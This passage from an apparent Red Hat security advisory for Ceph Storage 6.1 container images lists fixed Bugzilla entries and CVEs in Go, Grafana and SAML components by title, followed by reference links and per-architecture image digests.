*   BZ - 2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip
*   BZ - 2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal
*   BZ - 2113814 - CVE-2022-32189 golang: math/big: decoding big.Float and big.Rat types can panic if the encoded message is too short, potentially allowing a denial of service
*   BZ - 2124668 - CVE-2022-32190 golang: net/url: JoinPath does not strip relative path components in all circumstances
*   BZ - 2124669 - CVE-2022-27664 golang: net/http: handle server errors after sending GOAWAY
*   BZ - 2125514 - CVE-2022-35957 grafana: Escalation from admin to server admin when auth proxy is used
*   BZ - 2131146 - CVE-2022-31130 grafana: data source and plugin proxy endpoints leaking authentication tokens to some destination plugins
*   BZ - 2131147 - CVE-2022-31123 grafana: plugin signature bypass
*   BZ - 2131148 - CVE-2022-39201 grafana: Data source and plugin proxy endpoints could leak the authentication cookie to some destination plugins
*   BZ - 2131149 - CVE-2022-39229 grafana: using email as a username can block other users from signing in
*   BZ - 2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters
*   BZ - 2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps
*   BZ - 2138014 - CVE-2022-39306 grafana: email addresses and usernames cannot be trusted
*   BZ - 2138015 - CVE-2022-39307 grafana: User enumeration via forget password
*   BZ - 2148252 - CVE-2022-39324 grafana: Spoofing of the originalUrl parameter of snapshots
*   BZ - 2149181 - CVE-2022-41912 crewjam/saml: Authentication bypass when processing SAML responses containing multiple Assertion elements
*   BZ - 2168965 - \[cee/sd\]\[rook-ceph\]cephfs-top utility is not available under rook-ceph-oprator/tools pod
*   BZ - 2174461 - add dbus-daemon binary - required for NFS in ODF 4.13
*   BZ - 2174462 - add ceph-exporter pkg to RHCS 6.1 image
*   BZ - 2186142 - \[RHCS 6.1\] \[Deployment\] Cephadm bootstrap failing with default image.

**CVEs**

*   CVE-2021-42581
*   CVE-2022-1650
*   CVE-2022-1705
*   CVE-2022-2880
*   CVE-2022-21680
*   CVE-2022-21681
*   CVE-2022-24675
*   CVE-2022-24785
*   CVE-2022-26148
*   CVE-2022-27664
*   CVE-2022-28131
*   CVE-2022-28327
*   CVE-2022-29526
*   CVE-2022-30629
*   CVE-2022-30630
*   CVE-2022-30631
*   CVE-2022-30632
*   CVE-2022-30633
*   CVE-2022-30635
*   CVE-2022-31097
*   CVE-2022-31107
*   CVE-2022-31123
*   CVE-2022-31130
*   CVE-2022-32148
*   CVE-2022-32189
*   CVE-2022-32190
*   CVE-2022-35957
*   CVE-2022-39201
*   CVE-2022-39229
*   CVE-2022-39306
*   CVE-2022-39307
*   CVE-2022-39324
*   CVE-2022-41715
*   CVE-2022-41912

**References**

*   https://access.redhat.com/security/updates/classification/#important
*   https://access.redhat.com/documentation/en-us/red\_hat\_ceph\_storage/6.1/html/release\_notes/index

**ppc64le**

rhceph/keepalived-rhel9@sha256:36abd2b22ebabea813c5afde35b0b80a200056f811267e89f0270da9155b1a22

rhceph/rhceph-6-dashboard-rhel9@sha256:50329da263e8ef00c47632156761621bac30fead5e574ef23cd1d30b7af0019a

rhceph/rhceph-6-rhel9@sha256:9b477366f861df49b533d95941b9770b032827bb4a259c5f86abce8705960c05

rhceph/rhceph-haproxy-rhel9@sha256:8cc4a146d7be5046b416fe9c04d77b4f0a25a2ab7180fdbf8c46cff8e2483080

rhceph/rhceph-promtail-rhel9@sha256:f52fd8d5fbfdcc202c5e31096119377a8b87f9efd31602398d45cec86ec35940

rhceph/snmp-notifier-rhel9@sha256:8887234fbbaddf620eaa7b0f4b1ed6ab8aa5bc52e019e67179554ccd03fba676

**s390x**

rhceph/keepalived-rhel9@sha256:2ae4274163155d880cbd41d1a197d6856f326501a50e028ff3de9ff8a85b3e97

rhceph/rhceph-6-dashboard-rhel9@sha256:3fb7480f9d68333e168eae0c9fbeceb0df7962a40c25ecced81ea4c4959b2c25

rhceph/rhceph-6-rhel9@sha256:72bd6eb932a368af10d5c607d8b60e0fe8b87862f4adaa17fd022a3427a46ca8

rhceph/rhceph-haproxy-rhel9@sha256:e4da2c9d53159d43c6795151eb3c9dea373da19b34d76094b60e7a2466415d62

rhceph/rhceph-promtail-rhel9@sha256:44697ad0d15d1f37b98243f5f013cb9271d70e2b10ab52093a1d7e3409a674b2

rhceph/snmp-notifier-rhel9@sha256:df7c89608fe8352d445efcc1017521b35878cfe61a8b9fd91fab24c00786b2bf

**x86\_64**

rhceph/keepalived-rhel9@sha256:b21d882fd2d08d6f162dbb63e0626d9d6aa892a677c5a28edc97b84feef1655a

rhceph/rhceph-6-dashboard-rhel9@sha256:1d7ca201b778e6a6cb559129e240233b6b6461399c67f979c07d5fe288c400f6

rhceph/rhceph-6-rhel9@sha256:953630d9f9924f17ab7ce168772c3facbaf6866b79a1cf0fb9aee1dcf6eb8c7d

rhceph/rhceph-haproxy-rhel9@sha256:720b3207087d4feb8ab59ffd0b70d6bc22fa21d53b62393779dfaf8972a32e60

rhceph/rhceph-promtail-rhel9@sha256:b46c0196fab3bd3a60b64a1d7ff8af6fbc7c3e526618da1cc78032bffa3be171

rhceph/snmp-notifier-rhel9@sha256:9078b49846d8ec681bec5b96f0d4087b4c66bdc6baf4701cfc9c8e8aeae89661

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

Tag

#php